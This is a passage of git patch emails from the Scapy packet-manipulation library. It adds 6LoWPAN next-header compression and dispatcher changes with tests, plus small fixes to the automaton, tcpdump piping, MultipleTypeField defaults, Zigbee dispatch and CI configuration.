def dispatch_hook(cls, _pkt=b"", *args, **kargs): + return LoWPAN_NHC_Hdr.get_next_cls(_pkt) or LoWPAN_NHC_Hdr + + def extract_padding(self, s): + return b"", s + + +class LoWPAN_NHC_UDP(LoWPAN_NHC_Hdr): + fields_desc = [ + BitField("res", 0x1e, 5), + BitField("C", 0, 1), + BitField("P", 0, 2), + MultipleTypeField( + [(BitField("udpSourcePort", 0, 16), + lambda pkt: pkt.P in [0, 1]), + (BitField("udpSourcePort", 0, 8), + lambda pkt: pkt.P == 2), + (BitField("udpSourcePort", 0, 4), + lambda pkt: pkt.P == 3)], + BitField("udpSourcePort", 0x0, 16), + ), + MultipleTypeField( + [(BitField("udpDestPort", 0, 16), + lambda pkt: pkt.P in [0, 2]), + (BitField("udpDestPort", 0, 8), + lambda pkt: pkt.P == 1), + (BitField("udpDestPort", 0, 4), + lambda pkt: pkt.P == 3)], + BitField("udpDestPort", 0x0, 16), + ), + ConditionalField( + XShortField("udpChecksum", 0x0), + lambda pkt: pkt.C == 0 + ), + ] + + +_lowpan_nhc_ipv6ext_eid = { + 0: "Hop-by-hop Options Header", + 1: "IPv6 Routing Header", + 2: "IPv6 Fragment Header", + 3: "IPv6 Destination Options Header", + 4: "IPv6 Mobility Header", + 7: "IPv6 Header", +} + + +class LoWPAN_NHC_IPv6Ext(LoWPAN_NHC_Hdr): + fields_desc = [ + BitField("res", 0xe, 4), + BitEnumField("eid", 0, 3, _lowpan_nhc_ipv6ext_eid), + BitField("nh", 0, 1), + ConditionalField( + ByteField("nhField", 0), + lambda pkt: pkt.nh == 0 + ), + FieldLenField("len", None, length_of="data", fmt="B"), + StrFixedLenField("data", b"", length_from=lambda pkt: pkt.len) + ] + def post_build(self, p, pay): + if self.len is None: + offs = (not self.nh) + 1 + p = p[:offs] + struct.pack("!B", len(p) - offs) + p[offs + 1:] + return p + pay -class LoWPAN_HC1(Raw): - name = "LoWPAN_HC1 Compressed IPv6 (Not supported)" + +class LoWPAN_NHC(Packet): + name = "LOWPAN_NHC" + fields_desc = [ + PacketListField( + "exts", [], cls=LoWPAN_NHC_Hdr, + next_cls_cb=lambda *s: LoWPAN_NHC_Hdr.get_next_cls(s[3]) + ) + ] + + def post_dissect(self, data): + if not self.underlayer or not hasattr(self.underlayer, "_ipv6"): + return data + if self.guess_payload_class(data) != IPv6: + return data + # Underlayer is LoWPAN_IPHC + packet = self.underlayer._ipv6 + try: + ipv6_hdr = next( + x for x in self.exts if isinstance(x, LoWPAN_NHC_IPv6Ext) + ) + except StopIteration: + ipv6_hdr = None + if ipv6_hdr: + # XXX todo: implement: append the IPv6 extension + # packet = packet / ipv6extension + pass + try: + udp_hdr = next( + x for x in self.exts if isinstance(x, LoWPAN_NHC_UDP) + ) + except StopIteration: + udp_hdr = None + if udp_hdr: + packet.nh = 0x11 # UDP + udp = UDP() + # https://tools.ietf.org/html/rfc6282#section-4.3.3 + if udp_hdr.C == 0: + udp.chksum = udp_hdr.udpChecksum + if udp_hdr.P == 0: + udp.sport = udp_hdr.udpSourcePort + udp.dport = udp_hdr.udpDestPort + elif udp_hdr.P == 1: + udp.sport = udp_hdr.udpSourcePort + udp.dport = 0xF000 + udp_hdr.udpDestPort + elif udp_hdr.P == 2: + udp.sport = 0xF000 + udp_hdr.udpSourcePort + udp.dport = udp_hdr.udpDestPort + elif udp_hdr.P == 3: + udp.sport = 0xF0B0 + udp_hdr.udpSourcePort + udp.dport = 0xF0B0 + udp_hdr.udpDestPort + packet.lastlayer().add_payload(udp / data) + else: + packet.lastlayer().add_payload(data) + data = raw(packet) + return Packet.post_dissect(self, data) + + def do_build(self): + if not isinstance(self.payload, IPv6): + return Packet.do_build(self) + pay = self.payload.payload + while pay and isinstance(pay.payload, _IPv6ExtHdr): + # XXX todo: populate a LoWPAN_NHC_IPv6Ext + pay = pay.payload + if isinstance(pay, UDP): + try: + udp_hdr = next( + x for x in self.exts if isinstance(x, LoWPAN_NHC_UDP) + ) + except StopIteration: + udp_hdr = LoWPAN_NHC_UDP() + # Guess best compression + if pay.sport >> 4 == 0xf0b and pay.dport >> 4 == 0xf0b: + udp_hdr.P = 3 + elif pay.sport >> 8 == 0xf0: + udp_hdr.P = 2 + elif pay.dport >> 8 == 0xf0: + udp_hdr.P = 1 + self.exts.insert(0, udp_hdr) + # https://tools.ietf.org/html/rfc6282#section-4.3.3 + if udp_hdr.P == 0: + udp_hdr.udpSourcePort = pay.sport + udp_hdr.udpDestPort = pay.dport + elif udp_hdr.P == 1: + udp_hdr.udpSourcePort = pay.sport + udp_hdr.udpDestPort = pay.dport & 255 + elif udp_hdr.P == 2: + udp_hdr.udpSourcePort = pay.sport & 255 + udp_hdr.udpDestPort = pay.dport + elif udp_hdr.P == 3: + udp_hdr.udpSourcePort = pay.sport & 15 + udp_hdr.udpDestPort = pay.dport & 15 + if udp_hdr.C == 0: + if pay.chksum: + udp_hdr.udpChecksum = pay.chksum + else: + udp_hdr.udpChecksum = UDP(raw(pay)).chksum + return Packet.do_build(self) + + def do_build_payload(self): + # Elide IPv6 payload, extensions and UDP + if isinstance(self.payload, IPv6): + cur = self.payload + while cur and isinstance(cur, (IPv6, UDP)): + cur = cur.payload + return raw(cur) + return Packet.do_build_payload(self) + + def guess_payload_class(self, payload): + if self.underlayer: + u = self.underlayer.underlayer + if isinstance(u, (LoWPANFragmentationFirst, + LoWPANFragmentationSubsequent)): + return Raw + return IPv6 + + +###################### +# 6LowPan Dispatcher # +###################### + +# https://tools.ietf.org/html/rfc4944#section-5.1 + +class SixLoWPAN_ESC(Packet): + name = "SixLoWPAN Dispatcher ESC" + fields_desc = [ByteField("dispatch", 0)] class SixLoWPAN(Packet): - name = "SixLoWPAN(Packet)" + name = "SixLoWPAN Dispatcher" @classmethod def dispatch_hook(cls, _pkt=b"", *args, **kargs): """Depending on the payload content, the frame type we should interpretate""" # noqa: E501 if _pkt and len(_pkt) >= 1: - if orb(_pkt[0]) == 0x41: + fb = ord(_pkt[:1]) + if fb == 0x41: return LoWPANUncompressedIPv6 - if orb(_pkt[0]) == 0x42: + if fb == 0x42: return LoWPAN_HC1 - if orb(_pkt[0]) >> 3 == 0x18: + if fb == 0x50: + return LoWPANBroadcast + if fb == 0x7f: + return SixLoWPAN_ESC + if fb >> 3 == 0x18: return LoWPANFragmentationFirst - elif orb(_pkt[0]) >> 3 == 0x1C: + if fb >> 3 == 0x1C: return LoWPANFragmentationSubsequent - elif orb(_pkt[0]) >> 6 == 0x02: + if fb >> 6 == 0x02: return LoWPANMesh - elif orb(_pkt[0]) >> 6 == 0x01: + if fb >> 6 == 0x01: return LoWPAN_IPHC return cls +################# +# Fragmentation # +################# + # fragmentate IPv6 MAX_SIZE = 96 @@ -804,23 +1169,16 @@ def sixlowpan_defragment(packet_list): results[tag] = results.get(tag, b"") + p[cls].payload.load # noqa: E501 return {tag: SixLoWPAN(x) for tag, x in results.items()} +############ +# Bindings # +############ -bind_layers(SixLoWPAN, LoWPANFragmentationFirst,) -bind_layers(SixLoWPAN, LoWPANFragmentationSubsequent,) -bind_layers(SixLoWPAN, LoWPANMesh,) -bind_layers(SixLoWPAN, LoWPAN_IPHC,) -bind_layers(LoWPANMesh, LoWPANFragmentationFirst,) -bind_layers(LoWPANMesh, LoWPANFragmentationSubsequent,) -bind_layers(Ether, SixLoWPAN, type=0xA0ED) +bind_layers(LoWPAN_HC1, IPv6) -# TODO: I have several doubts about the Broadcast LoWPAN -# bind_layers( LoWPANBroadcast, LoWPANHC1CompressedIPv6, ) -# bind_layers( SixLoWPAN, LoWPANBroadcast, ) -# bind_layers( LoWPANMesh, LoWPANBroadcast, ) -# bind_layers( LoWPANBroadcast, LoWPANFragmentationFirst, ) -# bind_layers( LoWPANBroadcast, LoWPANFragmentationSubsequent, ) +bind_top_down(LoWPAN_IPHC, LoWPAN_NHC, nh=1) +bind_layers(LoWPANFragmentationFirst, SixLoWPAN) +bind_layers(LoWPANMesh, SixLoWPAN) +bind_layers(LoWPANBroadcast, SixLoWPAN) -# TODO: find a way to chose between ZigbeeNWK and SixLoWPAN (cf. dot15d4.py) -# Currently: use conf.dot15d4_protocol value -# bind_layers(Dot15d4Data, SixLoWPAN) +bind_layers(Ether, SixLoWPAN, type=0xA0ED) diff --git a/test/dot15d4.uts b/test/dot15d4.uts index 6f0e6c8a23f..9587a948b0a 100644 --- a/test/dot15d4.uts +++ b/test/dot15d4.uts @@ -176,7 +176,7 @@ assert LoWPANUncompressedIPv6 in pkt.layers() lowpan_frag_first = b'\xc29\x00\x17`\x00\x00\x00\x00\x00\x00\x00 \x02\r\xb8\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01 \x02\r\xb8\x00\x00\x00\x00\x00\x11"\xff\xfe3DU\xc4\xf9\x00Pw\x9b\x18\x9d\x00\x00\x01\xa2P\x18\x13X\x08\x10\x00\x00GET / HTTP/1.1\r\nHost: [aaaa::11:22ff' lowpan_frag_first_packet = SixLoWPAN(lowpan_frag_first) -assert lowpan_frag_first_packet.load == b'`\x00\x00\x00\x00\x00\x00\x00 \x02\r\xb8\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01 \x02\r\xb8\x00\x00\x00\x00\x00\x11"\xff\xfe3DU\xc4\xf9\x00Pw\x9b\x18\x9d\x00\x00\x01\xa2P\x18\x13X\x08\x10\x00\x00GET / HTTP/1.1\r\nHost: [aaaa::11:22ff' +assert lowpan_frag_first_packet.load == b'\xc4\xf9\x00Pw\x9b\x18\x9d\x00\x00\x01\xa2P\x18\x13X\x08\x10\x00\x00GET / HTTP/1.1\r\nHost: [aaaa::11:22ff' = Frag second dissection @@ -203,6 +203,84 @@ assert p.destinyAddr == "aaaa::11:22ff:fe33:4455" q = LoWPAN_IPHC(tf=0x0) assert raw(q) == b'`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' += LoWPAN_IPHC - M=1, DAC=1, DAM=0 + +p = Dot15d4(b'a\x88\x10"\x00\x13\x00\x16Pw\x9cB\xe6\x87`\x12\xe1\x08~\x04\x08\x00\x00\x00\xf0Q\xc7\x1bX\x9e\xf3\x00\x00\x00\x1c\xfa\xfa\xfa\xfa\xe7k') + +assert p.m == 1 +assert p.dac == 1 +assert p.dam == 0 +assert p.dst == "ff00::f0:51c7" + +p = Dot15d4(raw(p)) +assert p.dst == "ff00::f0:51c7" + +assert raw(p) == b'a\x88\x10"\x00\x13\x00\x16Pw\x9cB\xe6\x87`\x12\xe1\x08~\x04\x08\x00\x00\x00\xf0Q\xc7\x1bX\x9e\xf3\x00\x00\x00\x1c\xfa\xfa\xfa\xfa\xe7k' + += LoWPAN_NHC - NHC_UDP + +p = Dot15d4(b'A\x88\x00"\x00\xff\xff\x13\x00};\x01\xf0\xda\xc9\xda\xc9\x85\x80\xc8\x00\x00\x00\x00\x00\x00\x00\xf2\xeb') + +assert LoWPAN_NHC in p +assert p[LoWPAN_NHC].exts[0].udpSourcePort == 56009 +assert p[LoWPAN_NHC].exts[0].udpDestPort == 56009 +assert p[LoWPAN_NHC].exts[0].udpChecksum == 0x8580 +assert p[UDP].sport == 56009 +assert p[UDP].dport == 56009 + +p.clear_cache() + +assert raw(p) == b'A\x88\x00"\x00\xff\xff\x13\x00};\x01\xf0\xda\xc9\xda\xc9\x85\x80\xc8\x00\x00\x00\x00\x00\x00\x00\xf2\xeb' + += LoWPAN_NHC - compute UDP NHC_UDP + +p = Dot15d4()/Dot15d4Data()/LoWPAN_IPHC()/LoWPAN_NHC()/IPv6()/UDP(sport=61618, dport=61621) +assert raw(p) == b'\x01\x08\x01\xff\xff\xff\xffd\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf3%\x1et' + +assert p.exts[0].udpSourcePort == 2 +assert p.exts[0].udpDestPort == 5 +assert p.exts[0].udpChecksum == 0x1e74 + += LoWPAN_NHC - NHC_IPv6Ext + +p = Dot15d4(b'a\x88\x07"\x00\x16\x00\x13\x00|f\x10\x00\x13\x00\x12\xe1\x08~\x04\n\x00\x00\x00\xf0Q\xc7\x1bX\x9f\t\x00\x00\x00\t\xfa\xfa\xfa\xfa\xf0\xeb') + +assert LoWPAN_NHC in p +assert p[LoWPAN_NHC].exts[0].eid == 0 +assert p[LoWPAN_NHC].exts[0].len == 8 +assert p[LoWPAN_NHC].exts[0].data == b'~\x04\n\x00\x00\x00\xf0Q' + += LoWPAN_HC1 dissection & build + +dat = b'\x00"\x19\x100\xe5\x00\x1c\xda\x00\x00\x01\x08\x00E\x00\x00m\xc7\xf3\x00\x00@\x11W\x0f\xac\x10\x02)\xac\x10\x014EZEZ\x00Y\x8f\xaaEX\x02\x01\x00\x00\x01\x01\xff\x00\x0c\xd14\x7f\xc1H4\x00\x05\xc68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001A\xcc\xa5\xff\xff\x8a\x18\x00\xff\xff\xda\x1c\x00\x88\x18\x00\xff\xff\xda\x1c\x00B\xfb`@\x04\x01\x1f\x88\xc0Hello 005 0x626B\n\xa5\x0b' +p = Ether(dat) +p.clear_cache() + +assert p[LoWPAN_HC1].src == p[IPv6].src == 'fe80::21c:daff:ff00:1888' +assert p[LoWPAN_HC1].dst == p[IPv6].dst == 'fe80::21c:daff:ff00:188a' +assert p[LoWPAN_HC1].hopLimit == p[IPv6].hlim == 64 +assert p[LoWPAN_HC1].hc2Field.sc == 0 +assert p[LoWPAN_HC1].hc2Field.dc == 1 +assert p[LoWPAN_HC1].hc2Field.lc == 1 +assert p[IPv6].nh == socket.IPPROTO_UDP +assert p[LoWPAN_HC1].udpSourcePort == p.getlayer(UDP, 2).sport == 1025 +assert p[LoWPAN_HC1].udpDestPort == p.getlayer(UDP, 2).dport == 61617 +assert p[LoWPAN_HC1].udpChecksum == p.getlayer(UDP, 2).chksum == 0xf88c +assert p.getlayer(UDP, 2).len == 27 + +assert raw(p) == dat + += LoWPAN_HC1 build from scratch + +a = Dot15d4()/Dot15d4Data()/LoWPAN_HC1()/IPv6()/UDP() +assert raw(a) == b'\x01\x08\x01\xff\xff\xff\xffB\x03\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x03P\x03P\x00\x8f\xf7 ' + +a = Dot15d4(raw(a)) +assert a[LoWPAN_HC1].nh == 1 +assert a[LoWPAN_HC1].hc2 == 1 +assert a[LoWPAN_HC1].udpDestPort +assert a[LoWPAN_HC1].udpSourcePort + = Advanced packets - dissection & FCS computation # SAMPLE PACKETSS!!! IEEE 802.15.4 containing @@ -231,6 +309,8 @@ ieee = Dot15d4FCS(ieee802_iphc) ieee.show() assert ieee.fcs == 0x16c1 +assert ieee[LoWPAN_IPHC].dst == '::1' + del ieee.fcs ieee = Dot15d4FCS(raw(ieee)) assert ieee.fcs == 0x16c1 @@ -328,9 +408,9 @@ assert LoWPANUncompressedIPv6 in packet # extracted from 6lowpan-test.pcap udp = Ether()/IP()/UDP()/ZEP2()/Dot15d4()/Dot15d4Data()/b"\x7e\xf7\x00\xf0\x22\x3d\x16\x2e\x8e\x60\x10\x03\x00\x00\xaa\xaa\x00\x00\x00\x00\x00\x00\x48\x65\x6c\x6c\x6f\x20\x31\x20\x66\x72\x6f\x6d\x20\x74\x68\x65\x20\x63\x6c\x69\x65\x6e\x74\x2e\x2d\x2e\x2d\x2e\x2d\x20\x30\x20\x33\x34\x35\x36\x37\x38\x39\x20\x31\x20\x33\x34\x35\x36\x37\x38\x39\x20\x32\x20\x33\x34\x35\x36\x37\x38\x39\x20\x33\x20\x33\x34\x35\x36\x37\x38\x39\x20\x34\x20\x33\x34\x35\x36" packet = Ether(raw(udp)) -assert packet.udpSourcePort == 8765 -assert packet.udpDestinyPort == 5678 -assert packet.udpChecksum == 0x8e60 +assert packet.exts[0].udpSourcePort == 8765 +assert packet.exts[0].udpDestPort == 5678 +assert packet.exts[0].udpChecksum == 0x8e60 assert packet[IPv6].nh == 0x11 # the ipv6 header assert packet[IPv6][UDP].sport == 8765 #udp decompressed header assert packet[IPv6][UDP].dport == 5678 #udp decompressed header @@ -353,10 +433,10 @@ assert packet.tc_ecn == 0 and packet.flowlabel == 467 packet = SixLoWPAN()/LoWPAN_IPHC(tf=2)/IPv6(tc = 12, fl=467) packet = SixLoWPAN(raw(packet)) -assert (packet.tc_ecn << 6) + packet.tc_dscp == 12 and packet.flowlabel == 0 +assert (packet.tc_ecn << 6) + packet.tc_dscp == 12 and packet.flowlabel is None packet = SixLoWPAN()/LoWPAN_IPHC(tf=3)/IPv6(tc = 12, fl=467) packet = SixLoWPAN(raw(packet)) -assert (packet.tc_ecn << 6) + packet.tc_dscp == 0 and packet.flowlabel == 0 +assert packet.tc_ecn is None and packet.tc_dscp is None and packet.flowlabel is None #TODO: Next Header Test From 0d8df484a0e43375818aafae9190b77d9048ec83 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 14 Sep 2020 19:56:47 +0000 Subject: [PATCH 0276/1632] Automaton: Skip immediate tests for CommandMessage --- scapy/automaton.py | 24 ++++++++++++++---------- test/tls/tests_tls_netaccess.uts | 1 + 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 6ef3d886955..91ebed52771 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -885,16 +885,20 @@ def _do_iter(self): elif not isinstance(state_output, list): state_output = state_output, - # Then check immediate conditions - for cond in self.conditions[self.state.state]: - self._run_condition(cond, *state_output) - - # If still there and no conditions left, we are stuck! - if (len(self.recv_conditions[self.state.state]) == 0 and - len(self.ioevents[self.state.state]) == 0 and - len(self.timeout[self.state.state]) == 1): - raise self.Stuck("stuck in [%s]" % self.state.state, - state=self.state.state, result=state_output) # noqa: E501 + # If there are commandMessage, we should skip immediate + # conditions. + if not select_objects([self.cmdin], 0): + # Then check immediate conditions + for cond in self.conditions[self.state.state]: + self._run_condition(cond, *state_output) + + # If still there and no conditions left, we are stuck! + if (len(self.recv_conditions[self.state.state]) == 0 and + len(self.ioevents[self.state.state]) == 0 and + len(self.timeout[self.state.state]) == 1): + raise self.Stuck("stuck in [%s]" % self.state.state, + state=self.state.state, + result=state_output) # Finally listen and pay attention to timeouts expirations = iter(self.timeout[self.state.state]) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 259a956f007..5efd379443c 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -363,6 +363,7 @@ def _test_connection(): server_name="www.google.com") pkt = a.sr1(HTTP()/HTTPRequest(Host="www.google.com"), session=TCPSession(app=True), timeout=2, retry=3) + a.close() assert HTTPResponse in pkt assert b"" in pkt[HTTPResponse].load From f7a5b026441edc1b2effc61c6e3e269849db6204 Mon Sep 17 00:00:00 2001 From: rg21493 <64581894+rg21493@users.noreply.github.com> Date: Wed, 16 Sep 2020 16:42:45 +0100 Subject: [PATCH 0277/1632] Pass pcap file objects through to tcpdump's stdin (#2781) * Pass pcap file objects through to tcpdump's stdin * Don't use pipe argument Co-authored-by: Rob 15443 Co-authored-by: gpotter2 --- scapy/utils.py | 48 +++++++++++++++++++++++++++++---------------- test/regression.uts | 4 ++-- 2 files changed, 33 insertions(+), 19 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 2c0ecce5ebe..6eab9cc267c 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1794,6 +1794,9 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, if prog[0] == conf.prog.wireshark: # Start capturing immediately (-k) from stdin (-i -) read_stdin_opts = ["-ki", "-"] + elif prog[0] == conf.prog.tcpdump: + # Capture in packet-buffered mode (-U) from stdin (-r -) + read_stdin_opts = ["-U", "-r", "-"] else: read_stdin_opts = ["-r", "-"] else: @@ -1831,26 +1834,37 @@ def tcpdump(pktlist=None, dump=False, getfd=False, args=None, flt=None, stderr=stderr, ) else: - # pass the packet stream - with ContextManagerSubprocess(prog[0], suppress=_suppress): - proc = subprocess.Popen( - prog + read_stdin_opts + args, - stdin=subprocess.PIPE, - stdout=stdout, - stderr=stderr, - ) + try: + pktlist.fileno() + # pass the packet stream + with ContextManagerSubprocess(prog[0], suppress=_suppress): + proc = subprocess.Popen( + prog + read_stdin_opts + args, + stdin=pktlist, + stdout=stdout, + stderr=stderr, + ) + except (AttributeError, ValueError): + # write the packet stream to stdin + with ContextManagerSubprocess(prog[0], suppress=_suppress): + proc = subprocess.Popen( + prog + read_stdin_opts + args, + stdin=subprocess.PIPE, + stdout=stdout, + stderr=stderr, + ) if proc is None: # An error has occurred return - try: - proc.stdin.writelines(iter(lambda: pktlist.read(1048576), b"")) - except AttributeError: - wrpcap(proc.stdin, pktlist, linktype=linktype) - except UnboundLocalError: - # The error was handled by ContextManagerSubprocess - pass - else: - proc.stdin.close() + try: + proc.stdin.writelines(iter(lambda: pktlist.read(1048576), b"")) + except AttributeError: + wrpcap(proc.stdin, pktlist, linktype=linktype) + except UnboundLocalError: + # The error was handled by ContextManagerSubprocess + pass + else: + proc.stdin.close() if proc is None: # An error has occurred return diff --git a/test/regression.uts b/test/regression.uts index fdb18f151ac..038596bac56 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7372,7 +7372,7 @@ with mock.patch('subprocess.Popen', return_value=Bunch( tcpdump([pkt], linktype="DLT_EN3MB", use_tempfile=False) popen.assert_called_once_with( - [conf.prog.tcpdump, '-y', 'EN3MB', '-r', '-'], + [conf.prog.tcpdump, '-y', 'EN3MB', '-U', '-r', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) print(bytes_hex(f.getvalue())) @@ -7393,7 +7393,7 @@ with mock.patch('subprocess.Popen', return_value=Bunch( tcpdump([pkt], linktype=scapy.data.DLT_EN10MB, use_tempfile=False) popen.assert_called_once_with( - [conf.prog.tcpdump, '-y', 'EN10MB', '-r', '-'], + [conf.prog.tcpdump, '-y', 'EN10MB', '-U', '-r', '-'], stdin=subprocess.PIPE, stdout=None, stderr=None) print(bytes_hex(f.getvalue())) From 0cc1cef1e8318a8625f2d263c15b2f84dda12f59 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 16 Sep 2020 15:35:37 +0000 Subject: [PATCH 0278/1632] Fix MultipleTypeField's defaults --- scapy/fields.py | 10 +++++----- test/fields.uts | 3 +++ 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 0b4c1e5276c..1dcafc08cf7 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -288,11 +288,12 @@ class MultipleTypeField(object): """ - __slots__ = ["flds", "dflt", "name"] + __slots__ = ["flds", "dflt", "name", "default"] def __init__(self, flds, dflt): self.flds = flds self.dflt = dflt + self.default = None # So that we can detect changes in defaults self.name = self.dflt.name def _iterate_fields_cond(self, pkt, val, use_val): @@ -301,6 +302,8 @@ def _iterate_fields_cond(self, pkt, val, use_val): for fld, cond in self.flds: if isinstance(cond, tuple): if use_val: + if val is None: + val = self.dflt.default if cond[1](pkt, val): return fld continue @@ -324,10 +327,7 @@ def _find_fld_pkt_val(self, pkt, val): """ fld = self._iterate_fields_cond(pkt, val, True) - # Default ? (in this case, let's make sure it's up-do-date) - dflts_pkt = pkt.default_fields - if val == dflts_pkt[self.name] and self.name not in pkt.fields: - dflts_pkt[self.name] = fld.default + if val is None: val = fld.default return fld, val diff --git a/test/fields.uts b/test/fields.uts index 9a93eaa2f24..cfe71233957 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1387,6 +1387,9 @@ assert o.subfield == 0xDEAD o.switch = 2 assert o.subfield == 0xBEEFBEEF +o = SweetPacket(switch=1, subfield=0x88) +assert o.subfield == 0x88 + ######## ######## + FlagsField From 1fe6a37e8e9ca1d7c298a3969cd0395132c9606f Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 16 Sep 2020 18:09:01 +0200 Subject: [PATCH 0279/1632] Fix PyPy > 7.2.1 but < 7.3.2 fix https://github.com/secdev/scapy/issues/2814 --- scapy/arch/common.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/arch/common.py b/scapy/arch/common.py index e9380d3554f..375a1f1bd25 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -128,9 +128,9 @@ def compile_filter(filter_exp, iface=None, linktype=None, raise Scapy_Exception( "Failed to compile filter expression %s (%s)" % (filter_exp, ret) ) - if conf.use_pypy and sys.pypy_version_info <= (7, 3, 0): - # PyPy < 7.3.0 has a broken behavior - # https://bitbucket.org/pypy/pypy/issues/3114 + if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): + # PyPy < 7.3.2 has a broken behavior + # https://foss.heptapod.net/pypy/pypy/-/issues/3298 return struct.pack( 'HL', bpf.bf_len, ctypes.addressof(bpf.bf_insns.contents) From 461e49a0be58c24420b55477502d76729174cd4b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 17 Sep 2020 22:31:08 +0000 Subject: [PATCH 0280/1632] ZigbeeNWK dispatch_hook for its Stub --- scapy/layers/zigbee.py | 13 +++++++++++-- test/dot15d4.uts | 17 ++++------------- 2 files changed, 15 insertions(+), 15 deletions(-) diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 3f7c4e35987..0a1ece3fc36 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -247,7 +247,8 @@ class ZigbeeNWK(Packet): fields_desc = [ BitField("discover_route", 0, 2), BitField("proto_version", 2, 4), - BitEnumField("frametype", 0, 2, {0: 'data', 1: 'command'}), + BitEnumField("frametype", 0, 2, + {0: 'data', 1: 'command', 3: 'Inter-PAN'}), FlagsField("flags", 0, 8, ['multicast', 'security', 'source_route', 'extended_dst', 'extended_src', 'reserved1', 'reserved2', 'reserved3']), # noqa: E501 XLEShortField("destination", 0), XLEShortField("source", 0), @@ -264,8 +265,16 @@ class ZigbeeNWK(Packet): ConditionalField(FieldListField("relays", [], XLEShortField("", 0x0000), count_from=lambda pkt:pkt.relay_count), lambda pkt:pkt.flags & 0x04), # noqa: E501 ] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 2: + frametype = ord(_pkt[:1]) & 3 + if frametype == 3: + return ZigbeeNWKStub + return cls + def guess_payload_class(self, payload): - if self.flags & 0x02: + if self.flags.security: return ZigbeeSecurityHeader elif self.frametype == 0: return ZigbeeAppDataPayload diff --git a/test/dot15d4.uts b/test/dot15d4.uts index 9587a948b0a..16f5a4eaa76 100644 --- a/test/dot15d4.uts +++ b/test/dot15d4.uts @@ -555,20 +555,11 @@ packet.show2() conf.dot15d4_protocol = "zigbee" -= Zigbee - layers += ZigbeeNWKStub - ZigbeeNWK dispatch_hook -# a crazy packet with all classes in it! -pkt = ZigBeeBeacon()/ZigbeeAppCommandPayload()/ZigbeeAppDataPayload()/ZigbeeAppDataPayloadStub()/ZigbeeClusterLibrary()/ZigbeeDeviceProfile()/ZigbeeNWK()/ZigbeeNWKCommandPayload()/ZigbeeNWKStub()/ZigbeeSecurityHeader() -assert ZigBeeBeacon in pkt.layers() -assert ZigbeeAppCommandPayload in pkt.layers() -assert ZigbeeAppDataPayload in pkt.layers() -assert ZigbeeAppDataPayloadStub in pkt.layers() -assert ZigbeeClusterLibrary in pkt.layers() -assert ZigbeeDeviceProfile in pkt.layers() -assert ZigbeeNWK in pkt.layers() -assert ZigbeeNWKCommandPayload in pkt.layers() -assert ZigbeeNWKStub in pkt.layers() -assert ZigbeeSecurityHeader in pkt.layers() +pkt = Dot15d4()/Dot15d4Data()/ZigbeeNWKStub() +pkt = Dot15d4(raw(pkt)) +assert ZigbeeNWKStub in pkt = Zigbee - ZCLGeneralReadAttributesResponse From 2177873231c88471ff044f5133cafdd79f91fdcd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 17 Sep 2020 23:13:10 +0000 Subject: [PATCH 0281/1632] Disable ISOTPSCAN tests --- scapy/tools/UTscapy.py | 2 ++ test/contrib/isotpscan.uts | 4 ++++ 2 files changed, 6 insertions(+) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 54aa4c1e597..af292acb113 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -990,6 +990,8 @@ def main(): if VERB > 2: print("### libpcap mode ###") + KW_KO.append("disabled") + # Process extras if six.PY3: KW_KO.append("FIXME_py3") diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 8ec821613a7..98edfaa100a 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,5 +1,9 @@ % Regression tests for ISOTPScan +# Currently too unstable + +~ disabled + + Configuration ~ conf From 6dda7cd3571c335114316a28e324a7fb5b9a9681 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 18 Sep 2020 17:58:46 +0000 Subject: [PATCH 0282/1632] Lighten up codecov rules --- .github/codecov.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/codecov.yml b/.github/codecov.yml index 13cea13ba0e..cb9392d9391 100644 --- a/.github/codecov.yml +++ b/.github/codecov.yml @@ -16,7 +16,11 @@ coverage: round: down status: # Only consider changes to the whole project - project: true + project: + default: + 